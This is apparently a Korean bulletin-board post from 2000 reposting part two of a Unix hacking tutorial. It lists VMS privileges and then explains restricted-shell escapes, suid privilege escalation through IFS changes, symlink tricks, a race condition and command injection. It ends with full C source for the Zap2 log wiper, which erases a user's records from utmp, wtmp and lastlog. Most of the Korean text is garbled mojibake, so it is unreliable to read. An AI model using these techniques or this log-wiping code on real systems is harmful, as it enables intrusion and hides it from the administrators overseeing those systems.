2000/08/06(21:33) from 203.255.160.61 | |
작성자 : 강줄기 (jkkang65@hanmail.net) | 조회수 : 4422 , 줄수 : 356 |
[강좌] 유닉스에서 해킹하기 - [2] 펌온글 |
VMS에서의 권한은 어떤 것이 있나? ACNT Allows you to restrain accounting messages ALLSPOOL Allows you to allocate spooled devices ALTPRI Alter Priority. This allows you to set any priority value BUGCHK Allows you to make bug check error log entries BYPASS Enables you to disregard protections CMEXEC / CMKRNL Change to executive or kernel mode. These privileges allow a process to execute optional routines with KERNEL and EXECUTIVE access modes. CMKRNL is the most powerful privilege on VMS, as anything protected can be accessed if you have this privilege. You must have these privileges to gain access to the kernel data structures directly. DETACH This privilege allows you to create detached processes of arbitrary UICs DIAGNOSE With this privilege you can diagnose devices EXQUOTA Allows you to exceed your disk quota GROUP This privilege grants you permission to affect other processes in the same rank GRPNAM Allows you to insert group logical names into the group logical names table. GRPPRV Enables you to access system group objects through the system protection field LOG_IO Allows you to issue logical input/output requests MOUNT May execute the mount function NETMBX Allows you to create network connections OPER Allows you to perform operator functions PFNMAP Allows you to map to specific physical pages PHY_IO Allows you to perform physical input/output requests PRMCEB Can create permanent common event clusters PRMGBL Allows you to create permanent global sections PRMMBX Allows you to create permanent mailboxes PSWAPM Allows you to change a process's swap mode READALL Allows you read access to everything SECURITY Enables you to perform security-related functions SETPRV Enables all privileges SHARE Allows you to access devices allocated to other users. This is used to assign system mailboxes. 
SHMEM Enables you to modify objects in shared memory SYSGBL Allows you to create system wide permanent global sections SYSLCK Allows you to lock system wide resources SYSNAM Allows you to insert in system logical names in the names table. SYSPRV If a process holds this privilege then it is the same as a process holding the system user identification code. TMPMBX Allows you create temporary mailboxes VOLPRO Enables you to override volume protection WORLD When this is set you can affect other processes in the world ÇÁ·Î¼¼½º°¡ ¾î¶² ±ÇÇÑÀ¸·Î ¼öÇàÇÏ°í ÀÖ´ÂÁö ¾Ë±â À§Çؼ ´ÙÀ½°ú °°Àº ¸í·ÉÀ» »ç¿ëÇÑ´Ù. $ show /proc/priv Á¦ÇÑµÈ ½©¿¡¼ ¾î¶»°Ô ºüÁ® ³ª¿À³ª? À߸ø ÀÛ¼ºÇÑ Á¦ÇÑ ½©¿¡¼´Â ½©¿¡¼ »ç¿ëÇÏ´Â ±â´ÉÀ» °¡Áø ÇÁ·Î±×·¥À» ¼öÇàÇÔÀ¸ ·Î¼ ºüÁ®³ª¿Ã ¼ö ÀÖ´Ù. ÁÁÀº ¿¹°¡ viÀÌ´Ù. vi¸¦ ¼öÇàÇÒ ¶§ ´ÙÀ½°ú °°Àº ¸í·É À» ÀÌ¿ëÇ϶ó. :set shell=/bikn/sh ±×¸®°í ³ª¼ ´ÙÀ¸¸ð°¡ °°Àº ¸í·ÉÀ» ÀÌ¿ëÇÏ¿© ½©À» ¾ò´Â´Ù. : shell Á¦ÇÑ ½©¿¡¼ "cd" ¸í·ÉÀ» »ç¿ëÇÒ ¼ö ¾øµµ·Ï ÇÑ´Ù¸é ±× °èÁ¤À¸·Î ftp¸¦ Çϸé cd¸¦ ÇÒ ¼ö ÀÖ´Ù. suid ½ºÅ©¸³Æ®³ª ÇÁ·Î±×·¥¿¡¼ ¾î¶»°Ô rootÀÇ ±ÇÇÑÀ» ¾òÀ» ¼ö ÀÖ³ª? 1. ÇÁ·Î±×·¥¿¡¼ system()À» ÀÌ¿ëÇÏ¿© ´Ù¸¥ ÇÁ·Î±×·¥À» ºÎ¸¥´Ù.¸é, IFS¸¦ º¯ °æÇÏ¿© ±× ÇÁ·Î±×·¥À» ¿ì·ÕÇÒ ¼ö ÀÖ´Ù. IFS´Â ³»ºÎ ÇÊµå ±¸ºÐÀÚ(Internal Field Separator)ÀÇ ¾àÀڷμ ½©¿¡¼ Àμö¸¦ ±¸ºÐÇÏ´Â ¹®Àڷμ »ç¿ëÇÏ´Â °Í ÀÌ´Ù. ÇÁ·Î±×·¥¿¡ ´ÙÀ½°ú °°Àº °ÍÀÌ Æ÷ÇԵȴٰí ÇÏÀÚ. system("bin/data") ±×¸®°í IFS¸¦ '/'·Î º¯°æÇÏ¸é ½©Àº ¸í·ÉÀ» ´ÙÀ½°ú °°ÀÌ ¹ø¿ªÇÑ´Ù. bin date ÀÌÁ¦, ÇÁ·Î±×·¥ Áß¿¡ binÀ̶ó´Â °ÍÀÌ °æ·Î(path)Áß¿¡ ÀÖ´Ù¸é, suid ÇÁ·Î±×·¥ Àº /bin/date ÇÁ·Î±×·¥ ´ë½Å binÀ̶ó´Â ÇÁ·Î±×·¥À» ¼öÇàÇÏ°Ô µÈ´Ù. IFS¸¦ ¹Ù²Ù±â À§Çؼ, ´ÙÀ½°ú °°Àº ¸í·ÉÀ» ÀÌ¿ëÇÑ´Ù. IFS='/'; export IFS setenv IFS '/' export IFS='/' 2. ½ºÅ©¸³Æ®¸¦ -i·Î ¿¬°á(link)ÇÑ´Ù. "-i"¶ó´Â ÇÁ·Î±×·¥À» ¸¸µé¾î ½Éº¼¸¯ ¸µÅ©(symbolic link)¸¦ ¸¸µç´Ù. "-i"¸¦ ¼öÇàÇÏ¸é ½©(/bin/sh)ÀÌ »óÈ£ÀÛ¿ë(interactive) ¸ðµå°¡ µÇ°Ô ÇÑ´Ù. ÀÌ ¹æ¹ý Àº suid(set uid)µÇ¾î ÀÖ´Â ½ºÅ©¸³Æ®¿¡¼¸¸ »ç¿ë°¡´ÉÇÏ´Ù. ¿¹: % ln suid.sh -i % -i # 3. °æÀï Á¶°ÇÀ» ÀÌ¿ëÇÑ´Ù. Ä¿³Î¿¡¼ /bin/sh¸¦ ·ÎµåÇÒ ¶§ ´Ù¸¥ ÇÁ·Î±×·¥À¸·Î ÇÁ·Î±×·¥¿¡ ´ëÇÑ ½Éº¼¸¯ ¸µ Å©¸¦ ¹Ù²Û´Ù. 
¿¹: nice -19 suidprog; ln -s evilprog suidroot 4. ÇÁ·Î±×·¥¿¡ À߸øµÈ ÀÔ·ÂÀ» º¸³½´Ù. ÇÁ·Î±×·¥°ú ´Ù¸¥ ¸í·ÉÀ» ÇÑ Ä¿¸Çµå ¶óÀο¡¼ ¼öÇàÇÑ´Ù. ¿¹: suidprog; id ½Ã½ºÅÛ ·Î±×¿¡¼ ³» Á¸À縦 ¾ø¾Ö´Â ¹æ¹ýÀº? /etc/utmp, /usr/adm/wtmp¿Í /usr/adm/lastlog ÆÄÀÏÀ» º¯°æÇÑ´Ù. À̰͵é Àº ÅؽºÆ® ÆÄÀÏÀÌ ¾Æ´Ï¶ó¼ vi·Î ÆíÁýÇÒ ¼ö ¾ø´Ù. Ưº°ÇÑ ¸ñÀûÀ» Áö´Ñ ÇÁ·Î±× ·¥À» ÀÛ¼ºÇØ¾ß ÇÑ´Ù. ¿¹: #include #include #include #include #include #include #include #include #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos = -1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, &utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L; } } close(f); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!n"); } else printf("Error.n"); } |